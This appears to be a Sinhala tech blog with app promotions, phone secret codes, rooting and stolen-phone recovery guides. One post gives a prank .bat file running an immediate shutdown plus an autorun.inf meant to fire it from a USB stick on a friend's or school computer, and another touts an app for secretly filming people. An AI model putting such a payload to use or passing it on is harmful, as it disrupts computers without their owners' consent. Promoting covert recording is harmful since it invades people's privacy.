Pages

Wednesday, November 30, 2016

නොදන්නා Number එකකින් Call එකක් එන විට කාගෙද කියලා නමත් එක්ක හොයාගන්නේ මෙන්න මෙහෙමයි.





ඔබටත් නොදන්නා Number වලින් Call එනවාද?ඒ කෝල් එන Number කාගෙද කියලා හොයාගන්න කැමතිද.ඉතාමත් පහසුවෙන් සොයාගමු නමත් සමගම.මෙන්න හැමෝටම වටින ඇප් එකක්.කරදරකාරි ඇමතුම් වලට නිමාවක්.බොහෝමයක් පහසුකම් සමගින්.

අපි නොදන්නා අංක හඳුනා ගැනීමට හා ස්පෑම් ඇමතුම් අවහිර යෙදුමක් ලෙස ආරම්භ කිරීමට  බොහෝ භාවිතා කරයි.දැන්ට මෙම App එක නොමිලේ ලබාදෙන අතරම ඉතිරියේ මෙම App එක ලබා ගැනීම්ට ගෙවීම් කිරීමට සිදුවීමට ඉඩ ඇත....












ඔබත් දැන්ම Free Download කරගන්න.

Skip Now To Download


How To Use Truecaller 

Watch Video









Monday, November 28, 2016

Phone එකේ Camera එකෙන් ගනන් හදමු







ඔබත් කැමතිද කැමරාවෙන් ගනන් හදන්න.එහෙනම් මේක බලන්නකෝ.මෙම ඇප් එක  PhotoMath ලෙස හදුන්වයි.මෙහිදි අපට අවශ්‍ය ගණිත ගැටලුවට විසදුම ලේසියෙන්ම ලබාගත හැක.
ඒ මෙන්න මේ විදියටයි....

1.ඔබගේ ගනිත ගැටලුව සහිත ප්‍රශ්න පත්‍රය ඔබගේ මේසය උඩින් තියන්න.

2.ඉන්පසුව මෙම App එක Download කර Install කරගන්න.

3.Skip Now දීලා Download කරගන්නකෝ....



4.ඔබ Install කරගත් App එක Open කරගන්න.

එහෙනම් අනෙක් ටික

බලන්නකෝ මෙතනින්.....



Sunday, November 27, 2016

කැඩුණු Phone එකක් සම්පුර්ණයෙන් ගලවලා නැවතත් හදමු.තනියම නිවසේදීම


ඔබේ දුරකතනයේ ඇති සුලු සුලු දෝශ තනිවම සාදාගමු. පුන්ච් දෝශ සදහා ලොකු ගනන් දීපු කාලේ ඉවරයි.තනියෙන් දුරකථන සාදාගන්න ආකාරය පියවරෙන් පියවර සියල්ලම සින්හලෙන්ම. සාදාගන්න ආකාරය මුලසිට වීඩියෝවක් ලෙස...





Skip Now දීලා වීඩියෝව බලන්න.




Samsung ෆෝන් වලට තනියම ගෙදරදිම Software ගහමු



Phone Shop ගානේ රස්තියාදු වෙවි Software ගහගන්න ලොකු ලොකු ගනන් වියදම් කරපු කාලේ ඉවරයි.ඔබත් කැමතිද තනියම Software ගහන්න ඉගෙන ගන්න.තවත් ස්වයං රැකියාවක් ලෙස උවද කල හැක.එහෙනම් මේක බලන්නකෝ. ඔක්කොම  සින්හලෙන්ම තියනවා.

Skip Now දීලා බලන්න.











අවශ්‍ය  Software එක මෙතනින් Download කරගන්න.







Saturday, November 19, 2016

අංක තහඩුවෙන් වාහනයේ තොරතුරු බලන ඇප් එක.







අපේ රටේ මෝටර් රථ වාහන දෙපාර්තමේන්තුව විසින් හදුන්වාදුන් මෙම ඇප් එක මගින් වාහනයේ අංකය ලබාදීමෙන් එහි
හිමිකරු , 
එන්ජිමේ අංකය,
රථයේ වර්ගය, 
ලියාපදිංචි වර්ෂය බලාගන්න පුලුවන්. වාහන මිලදී ගැනීම් සිදුකරන අයට වාහනවල අනන්‍යතාවය තහවුරු කර ගැනීමට එය ගොඩක් ප්‍රයෝජනවත් වෙනවා. බලන්න පහතින් ස්ක්‍රීන්ශොට් ගොඩක් වැදගත් වෙන App එකක්. ශ්‍රීලංකාවේ හැමෝගෙම දුරකථනවල තිබිය යුතුමය.දැන්ම නොමිලේම ඩවුන්ලෝඩ් කරගන්න


මෙතනින් පිවිස මෙම ඇප් එක ඔබගේ ඇන්ඩ්‍රොයිඩ් ස්මාර්ට් ෆෝන් එකට බාගන්න.




























Technical Details
App Name : Sri Lanka Vehicle Info
File size : Varies with device
Requirements : Android 2.1 and up
License : Free Publisher Web : www.icta.lk


හැමෝටම හොරෙන් වීඩියෝ කරන්න පොටෝ ගහන්න මෙන්න භාන්ඩේ. නොමිලේ




ඔන්න අද ගෙනාපු ලිපිය නම් ටිකක් වෙනස්.ඒත් මේක හැමෝටම වගේ ගොඩක් වැදගත් වේවි.මේ තමයි Spy කැමරාවේ විස්තරය.මේකෙන් ගොඩක් දේවල් කරන්න පුලුවන්.ඒකිව්වේ කාටත් හොරෙන් වීඩියෝ කරන්න පොටෝ ගහන්න පුලුවන්.සාමාන්‍ය ස්මාට් දුරකථනයෙන් වීඩියෝ කරත් අපි වීඩියෝ කරන එක දුරකථනයේ Display එකමත දර්ශනය වන බැවින් එහි සාර්ථක බවක් නොමැත.නමුත් මෙහි පහසුකම් බොහෝය.මෙමගින් වීඩියෝ කරන සහ පොටෝ ගන්න බවක් Displayහි දර්ශනය නොවේ.ඉතින් ඔයාලා මේක අරගෙනම බලන්න්කෝ.....

මෙන්න ඇන්ඩ්‍රොයිඩ් උපාංග සදහා....





Saturday, November 5, 2016

හැමෝටම වැදගත් වන සෑම දුරකතනයකම රහස් කේත සියල්ලම නොමිලේ. Free Mobile Phone Secret Codes

ජංගම දුරකතන වල රහස් කේත ( mobile phone codes )



                                  අපේ යාලුවො දන්නවනෙ අද කාලෙ Mobile Phone එකක් නැති කෙනෙක් හොයගන්න බෑ කියල.ඉතින් අද අපි කියල දෙනව මේ ෆෝන්ස් වල විවිධ තොරතුරු ලබාගන්න පුලුවන් එක එක secret codes මොනවද කියල.
 
*#92702689# - දුරකථනය භාවිතා කර ඇති කාලය , නිශ්පාදනය කර ඇති වර්ෂය , දිනය , විකිණූ දිනය වැනි විස්තර ලබාගැනීමට.*#0000# - දුරකථනයේ  මෘදුකාංග සංස්කරන අංකය (software version) , දිනය , දුරකථන මාදිලිය ආදී විස්තර ලබාගැනීමට.*#7780# - දුරකථනයේ settings restore කරගැනීමට ( මෙහිදී user data delete නොවන අතර settings පමණක් reset වේ )*#7370# - මෙහිදී දුරකතනයේ මුලු system memory එකම reset වේ.එනම් user data (SMS,Contacts,Notes & etc. ) සියල්ල මැකී යයි.*#2820# - Bletooth Aevice Address එක ලබාගැනීමට හැක.
____________________________________________________
 
*#*#7780#*# - දුරකථනයේ settings restore කරගැනීමට ( මෙහිදී user data delete නොවන අතර settings පමණක් reset වේ )
*#*#232331#*#* - Bluetooth පරීක්ෂාව කර හැක.
*#*#0*#*#* - දුරකථනයේ LCD එක පරීක්ෂා කර හැක.
*#*#2663#*#* - දුරකථනයේ Touch Screen එක පරීක්ෂා කර හැක.
*#9999#  හෝ *#0837 - දුරකථනයේ  මෘදුකාංග සංස්කරන අංකය (software version) , දිනය , දුරකථන මාදිලිය ආදී විස්තර ලබාගැනීමට.
*#9998*246# - Debug Menu එක ලබාගත හැක .
_____________________________________________________
දුරකථනයේ aroow keys හෝ joystick එක සමග * ලකුන භාවිතයෙන් පහත ක්‍රියකාරකම කර sony erisson දුරකථන වල secret menu එක ලබාගත හැක . 
  → * ← ← * ← *  
#82# - දුරකථනයේ  මෘදුකාංග සංස්කරන අංකය ( software version ) ,දිනය වැනි විස්තර ලබාගැනීමට.
0# - අන්තිමට dial කල number ලබා ගැනීමට.
____________________________________________________
2945#*# හෝ 2945*#01*# - දුරකථනයේ  secret menu එක ලබාගත හැක.
*#07# - මෙමගින් LG B1200 කාණ්ඩයේ දුරකථන වල මෘදුකාංග සංස්කරන අංකය (software version) , දිනය වැනි විස්තර ලබාගැනීමට හැක.
*6861# - දුරකථනයේ settings restore කරගැනීමට.
___________________________________________________
#02#* හෝ *#**837# - දුරකථනයේ  මෘදුකාංග සංස්කරන අංකය (software version ) ලබාගැනීමට.**0201# හෝ *#**367628# - දුරකථනයේ settings restore කරගැනීමට.
___________________________________________________
*#06# - IMEI  අංකය සමග මෘදුකාංග සංස්කරන අංකය (software version) බලාගැනීමට හැක. *#4837*# හෝ  *#8373# - දුරකථනයේ  මෘදුකාංග සංස්කරන අංකය ( software version ) ,දිනය වැනි විස්තර ලබාගැනීමට.###847# හෝ *#73738# - දුරකථනයේ settings restore කරගැනීමට.
____________________________________________________
Alt key සමග R,B,V,S යන අකුරු තද කිරීමෙන් ඕනෑම Web Page එකක Codes බලාගැනීමට හැක.
Alt සහ Shift (left) සමග H අකුර තද කිරීමෙන් Help Me Menu එක ලබාගැනීමට හැක.
බැටරිය ගලවා Alt + Shift (left) + Del යන Keys තද කිරීමෙන් Software Reset කිරීම කල හැක .
_____________________________________________________
ANDROID දුරකතන වල Secret Codes
*2767*3855# -  මෙහිදී දුරකතනයේ මුලු system memory එකම reset වේ.එනම් user data (SMS,Contacts,Notes & etc. ) සියල්ල මැකී යයි.
*#*#7594#*#* - මෙමගින් ඔබට Long Press Power Button Option මාරු කල හැක. උදා } Power Button එක Long Press කල විට කෙලින්ම Power Off වීමට සැකසීම.
*#*#232339#*#* හෝ *#*#526#*#* හෝ *#*#528#*#* - WLAN  පරීක්ෂාව කර හැක.
 *#*#1472365#*#* - GPS පරීක්ෂාව කර හැක.
 *#*#232331#*#* - Bluetooth පරීක්ෂාව කර හැක.
*#*#232337#*#  - Bluetooth Device Address එක ලබාගැනීමට හැක.
*#*#0*#*#* - LCD පරීක්ෂාව කර හැක.
*#*#0673#*#* හෝ *#*#0289#*#* - Melody පරීක්ෂාව කර හැක.
*#*#2664#*#* - Touch screen පරීක්ෂාව කර හැක.
*#*#0588#*#* - Proximity sensor පරීක්ෂාව කර හැක.
*#*#0842#*#* - Device test ( Vibration හා BackLight පරීක්ෂාව කර හැක )
*#*#273282*255*663282*#*#* - සියලුම Media Files BackUp කිරීමට.
*#7780# - දුරකථනයේ data restore කරගැනීමට.
____________________________________________________
ඕනෑම දුරකථනයක IMEI Number එක බලාගැනීමට අවශ්ය 
නම් *#06# Dial කරන්න.
සැ.‍යු. - මෙහි දක්වා ඇති Codes දුරකතන මාදිලියෙන් මාදිලියට
 වෙනස් වන නිසා සමහර Codes ක්‍රියා නොකිරීමට ඉඩ ඇත.

Friday, November 4, 2016

මෙන්න Note Pad Hacking යාලුවන්ව පිස්සු වට්ටමු

  • මුලින්ම මේ code එක notepad එකට copy කරල past කරන්න  එක ඔයාට කැමති නමක් දිලා කරගන්න හැබයි 
    extension එකට .bat කියල දෙන්න පහල පින්තුරෙ වගේ

@echo off

shutdown -s -t 00



EX: Doiyababa.bat



  • හරි දැන් අයෙත් notepad එක කරගෙන මේ code එකත්  past කරලා autorun.inf කියලා name එක දිලා save කරගන්නකො මේකේදි ඔයාලට name වෙනස් කරනන් බැ හොදේ


[autorun]
Open=besthacking.bat
Action=Mouse Disable 

ex: autorun.inf

  • ඔන්න හරි පුතේ ඔය දැන් අපි හදාගත්ත file දෙක pen එකකට දාලා යලුවෙක්ට හරි ඉස්කෝලේට හරි ගෙනිහින් pen එක ගහුවා නම් වැඩේ පත්තුවෙයි ගින්දර වගේ ඔයාගෙන් අහන්නෙම නැතුව කොම්පුටරේ off වෙලා යයි on කරන හැම පාරම ඔක කරා වගේ නෙමේ නේ නවත්තන හැටිත් දැන ගන්න එපැයි නෙද මහලොකු දෙයක් නැ task maneger එකෙන් ගිහින් autorun කියන prosess එක නැවත්තුවනම් අහවරයි  

නැති වෙච්ච සොරකම් කල Phone And Tab නැවතත් සොයාගමු


අද වන විට ජංගම දුරකතන හා ටැබ්ස් ලොකු කුඩා සියල්ලන් ලගම තියේන උපාංගයක්. ඒ වගේම තමයි අද සාමාජ ක්‍රමය අනුව හා මිනිසුන්ගේ කාර්ය බහුලත්වයත් එක්ක ජංගම දුරකතනයක් හෝ ටැබ් එකක් , මිනිස්සු ලග තිබිය යුතුම තත්වයකට පත් වෙල තියේනවා.
* ඉතින් , තමන් ලග තියේන ජංගම දුරකතනය හෝ ටැබ් එක සොරකම් කරෝත් හෝ නැති වුනෝත් , තමාගේ ජංගම දුරකතනයේ හෝ ටැබ් එකේ තියේන Pictures , Videos හා Documents යනාදි වැදගත් වටින දේවල් ඒ සොරකම් කරපු කෙනාට ලැබෙනව. සමහර විට , ඒ සොරකම් කරපු කෙනා , ඔබේ උපාන්ගයේ තියේන දේවල් වෙනත් වැරදි වැඩ වලට යොදා ගන්නත් පුලුවන්. එහම නැතුව ඒවා ටික අයින් කරල දාල ජංගම දුරකතනය හෝ ටැබ් එක විතරක් නිකන් පාවිච්චි කරන්නත් පුලුවන්.
* අපිට සොරකම් කරපු හෝ නැති වුන ජංගම දුරකතනය හෝ ටැබ් එක නැවත හොයා ගන්න පුලුවන් වුනත් , ඒක හොයා ගන්නකම් , ඒය සොරකම් කරපු පුද්ගලයා , ඒ උපාන්ගයේ තියේන Pictures , Videos , Documents යනාදි දේවල් බලන්නේ නැතුව ඉදිවි කියල නම් හිතන්න බැ.
ඒ නිසා කරන්න තියේන හොදම දේ , ඔබේ ඒ අදාල ජංගම දුරකතනය හෝ ටැබ් එක Lock කරන්න , නැත්නම් සියලුම Data ( Pictures , Videos , Documents ) Delete කරල දාන්න. ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක , ඇන්ඩ්‍රෝයිඩ් එකක් නම් මෙතනින්Android Device Manager එකට ගිහින් , ඒ දේවල් කරන්න පුලුවන්.
ජංගම දුරකතනයක් හෝ ටැබ් එකක් නැති වෙලා , නැවත සොයා ගන්න යම් කිසි කාලයක් යනවා. එතකම් කරන්න ඕන දේවල් කිපයකුත් තියේනවා. ඒ ගැන වෙනම පොස්ට් එකකින් කියන්නම්. දැනට , මේ උඩින් කිව්ව දේ කරන්න.
* අපේ සොරකම් කරපු හෝ නැති වුන ජංගම දුරකතනය හෝ ටැබ් එක සොයා ගන්න , අපට උදව් කරන්නේ , නැත්නම් අපට සහය ගන්න වෙන්නේ විදුලි සංදේශ නියාමන කොමිෂන් සභාව ( Sri lanka Telecommunications Regulatory Commission - TRC ) හා ශ්‍රී ලංකා පොලිසිය මගිනුයි.
* හරි , දැන් බලමු ඔබේ සොරකම් කරපු හෝ නැති වුන ජංගම දුරකතනය හෝ ටැබ් එක නැවත පහසුවෙන්ම සොයා ගන්නේ කොහමද කියල.
1. ) ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක සොරකම් කරල හෝ නැති වෙල කියල දැන ගත්තු ගමන්ම , ලගම තියේන පොලිස් ස්ථානයට ගිහින් , ඒ පිළිබදව පැමිණිල්ලක් දාන්න.
2. ) ඊට පස්සේ පොලිස් ස්ථානයේ දාපු පැමිණිල්ලේ කොපියක් අරන් , විදුලි සංදේශ නියාමක කොමිෂන් සභාව ( Sri lanka Telecommunications Regulatory Commission - TRC ) එකට යන්න.
TRC එකට යන්න අපහසු නම් , පැමිණිල්ලේ කොපියක් හා සොරකම් කරපු හෝ නැති වුන ජංගම දුරකතනයේ හෝ ටැබ් එකේ වර්ගය , අදාල IMEI අංකය හා ඔබේ ජාතික හැදුනුම්පතේ කොපියක් සමග TRC එකට තැපැල් කරන්න.
මෙන්න - එකේ ලිපිනය -
Telecommunications Regulatory Commission ,
No 276,
Elvitigala Mawatha ,
Colombo 08,
WP, Sri Lanka.
මේ පහලින් , - එකේ තව විස්තර දිල තියේනව. ඔබට ඕන නම් , මේ එක මාධ්‍යයකින් , - එක සම්බන්ධ කරගන්න පුලුවන්.
TRC එකේ දුරකතන අංකය - +94 11 2689345
TRC එකේ ලිපිනය  - dgtsl@trc.gov.lk
TRC වෙබ් සයිට් එක - www.trc.gov.lk
* ඔබේ ජංගම දුරකතනයේ හෝ ටැබ් එකේ IMEI අංකය සොයා ගන්නා ආකාරය.
මේ පහලින් කියල තියේන්නේ ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක නැති වෙන්න කලින් සොයා ගන්න ආකාරයන් ගැනයි.
මොනයම් හෝ දේයක් නිසා , ඔබේ IMEI අංකය දන්නේ නැත්නම් ඒ ගැන කරදර වෙන්න එපා. TRC එකට කිව්වාම , ඔබ IMEI අංකය දන්නේ නැ කියල , TRC එක විසින්ම නැති වෙන අවස්ථාවේ ඔබේ ජංගම දුරකතනයේ හෝ ටැබ් එකේ තිබුන Sim එකට අදාල සේවා සපයන ආයතනය සම්බන්ධ කරන් , ඒ නැති වුන ජංගම දුරකතනයට හෝ ටැබ් එකට අදාල IMEI අංකය හොයා ගන්නව.
අපි විසින් නිවැරදි IMEI අංකය ලබා දුන්නෝතින් , සොයා ගන්න වැඩ කටයුතු ඉක්මන් කරගන්න පුලුවන් නිසා තමයි , TRC එකට IMEI අංකය ලබා දෙන්නේ.
* ඔබේ දුරකතනයට හා ටැබ් එකට අදාල IMEI අංකය බලා ගන්න පුලුවන් ක්‍රම 2ක් තියේනව.
i. ] ඔබේ  ජංගම දුරකතනය හෝ ටැබ් එක අන්ඩ්‍රෝයිඩ් නම් , දුරකතනයේ හෝ ටැබ් එකේ Settings වල අන්තිම හරියේ තියේන About device කියන එකට යන. එහිත් , මුල් හරියේ තියෙන Status කියන එකට යන්න. දැන් , අදාල පිටුවේ මදක් පහලට යන විට IMEI කියල එකක් දැක ගන පුලුවන්. අන්න , ඒක තමයි ඔබේ දුරකතනයට හෝ  ටැබ් එකට අදාල IMEI අංකය.
( පහල පින්තුරේ පෙන්වා ඇත. ) [ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]
ii. ] ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක ඇන්ඩ්‍රෝයිඩ් වුනත් , නොවුනත් , මේ ක්‍රමය මගින් , ඔබේ අදාල IMEI අංකය හොයා ගන්න පුලුවන්. ඒ සදහා , Phone Dial Pad එකට ගිහින් , එහි *#06# කියල ටයිප් කරන්න. එවිට , අදාල IMEI අංකය දැක ගන්න පුලුවන්.
( පහල පින්තුරේ පෙන්වා ඇත. ) [ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]
3. ) මේ වන විට , අපේන් වෙන්න ඕන දේවල් සිදු වෙලයි තියේන්නේ
.
මෙතන ඉදන් ඉස්සරහට තියේන්නේ TRC එක මගින් කල යුතු වැඩ කටයුතුයි.
TRC එක මගින් ශ්‍රී ලංකාවේ දැනට ක්‍රියාත්මක Sim සපයන සේවා ආයතන 5 වන Dialog , Hutch , Mobitel , Airtel , Etisalat කියන ආයතන 5ටම කියනවා , මෙන්න මේ IMEI අංකය තියේන ජංගම දුරකතනයට හෝ ටැබ් එකට , ඔබේ ආයතනයේන් ගත්තු Sim එකක් දැම්ම ගමන් , TRC එකට ඒ පිළිබදව කියන්න කියනව.
ඊට පස්සේ , ඒ Sim ආයතන 5 විසින්ම සෙවිල්ලේන් ඉන්නව , TRC එක විසින් දුන්න IMEI අංකය තියේන ජංගම දුරකතනයට හෝ ටැබ් එකට , තමන්ගේ ආයතනයට අදාල Sim එකක් දානවද කියල. ඉන් පසු , තමන්ගේ ආයතනයට අදාල Sim එකක් දැම්ම ගමන් , ඒ අදාල ආයතනය විසින් TRC එකට කියනව , මෙන්න ඔයාල කිව්ව IMEI අංකය තියේන ජංගම දුරකතනයට හෝ ටැබ් එකට , මේ අංකය තියේන Sim එකක් දැම්ම කියල. ඒත් එක්කම ඒ Sim එකට අදාල සියලුම විස්තර හා මේ වන විට එම අදාල ජංගම දුරකතනය හෝ ටැබ් එක තියේන ස්ථානය පවා TRC එකට ලබා දෙනව.

4. ) දැන් , TRC එකේන් පොලිසියට දන්නවා , මේ නැති වුන ජංගම දුරකතනය හෝ ටැබ් එක නැවත සොයා ගත්තා කියල හා ඒය දැනට තියේන ස්ථානය හා අනෙකුත් විස්තර ලබා දෙනව. මෙතනින් එහාට මේ ජංගම දුරකතනය හෝ ටැබ් එක තියේන තැනට පොලිසිය ගිහින් , ඒය නැවත ලබා ගන්නවා.

5. ) මේ අතරේදි , TRC එක මගින් , අපිට ලිපියක් මගින් දැනුම් දෙනව , ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක නැවත සොයා ගත්ත , මෙන්න මේ පොලිස් ස්ථානයට ගිහින් , ඔබේ අනන්‍යතාවය හෙලි කරල , ඒය නැවත ලබා ගන්න කියල.
* ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක හොයා

ගන්න යන්න පුලුවන් කාලය ගැන හරියටම කියන්න ආමාරුයි. මොකද , ඒ සොරකම් කරපු කෙනා , එම ජංගම දුරකතනයට හෝ ටැබ් එකට , අලුතින් Sim එකක් දාල ක්‍රියාත්මක කරාට පස්සේ තමයි , ඒ අදාල Sim සේවා සපයන ආයතන වලට , ඒ ගැන හසු වෙන්නේ. ඊට පස්සෙ තමයි , අපි අදාල ජංගම දුරකතනය හෝ ටැබ් එක නැවත හොයා ගත්ත කියල TRC එකට කියන්නේ.
ඉතින් , ඔබේ නැති වුන ජංගම දුරකතනයට හෝ ටැබ් එකට , නැවත අලුතින් Sim එකක් දාල ක්‍රියාතමක කරන්න , ඒ සොරකම් කරපු කෙනා ගන්න කාලය අනුව තමයි , ඔබේ ජංගම දුරකතනය හෝ ටැබ් එක නැවත සොයා ගන්න කාලය තිරණය වෙන්නෙත්.
* කලින් භාවිතා කරපු ජංගම දුරකතනයක් හෝ ටැබ් එකක් , මිළදි ගැනිමේදි , මේ ගැනත් සැලකිලිමත් වන්න.
ඔබ විසින් කලින් භාවිතා කරපු ජංගම දුරකතනයක් හෝ ටැබ් එකක් මිළදි ගන්න යනව නම් , ඔබ ගොඩාක් සැලකිලිමත් වෙන්න ඕන. මොකද ඒ විධියට විකුණන්නේ , කාගේන් හරි සොරකම් කරපු එකක් වෙන්න පුලුවන්.
ඒ නිසා , කලින් භාවිතා කරපු ජංගම දුරකතනයක් හෝ ටැබ් එකක් , ඔබ විසින් මිළදි ගන්නවා නම් , ඒය විකුණන පුද්ගලාගේ ජාතික හැදුනුම්පතේ කොපියක් හා එම පුද්ගලයාගේන් ඒ සම්බන්ධව ලියුමක් ලබා ගන්න.
ඒ ලියුමට , මේ Brand එකට අයිති ජංගම දුරකතනයක් හෝ ටැබ් එකක් , මෙන්න මේ මිළට , මම විසින් , මෙම කමල් ( විකුණන පුද්ගලයාගේ නම ) නමැති පුද්ගලයගේන් , මෙන්න මේ දිනයේදි මිළට ගන්නව කියල ලියුම ලියලා , ලියුමේ ඇති සියලුම දේවල් සහතික කරමින් , ජංගම දුරකතනය හෝ ටැබ් එක විකුණන පුද්ගලයගේ අත්සනද එම ලියුමටම ලබා ගන්න.
එතකොට , මොකක් හරි ප්‍රශ්නයක් ආවෝත් , ඔබට බේරේන්න පුලුව

How To Root A Android Device


ඔන්න අද පෝස්ට් එක හැමෝටම වැදගත් හැමෝම අහන Android Device එකක් Root කරගන්න විදිය.Android Device එකක් Root කරගත්තම Android Device එකේ Full Control එකක් Userට ලැබෙනවා.එමෙන්ම Android Device එක පෙරටත් වඩා වේගවත් වන අතරම බැටරියේ ආයුකාලයද පෙරටත් වඩා වැඩි වේ.ඉතින් මේක කරන්න ගොඩක් ක්‍රම තියනවා.

මේ සදහා අපිට



















වැනි ක්‍රම භාවිතා කල හැක.
(අවශ්‍ය නම ක්‍රමය උඩ Click කර  Skip Ad දීලා Download කරගන්න.)
මේ සදහා V Root Software එක යොදාගමු....
මේක කියනවට වඩා ලේසි වෙන්න ඔයාලම මේ විඩියෝ එක බලන ගමන් Root කරන්නකො...











Thank You Bye See You Again With Next Post

Life Is A Race

Life Is A Race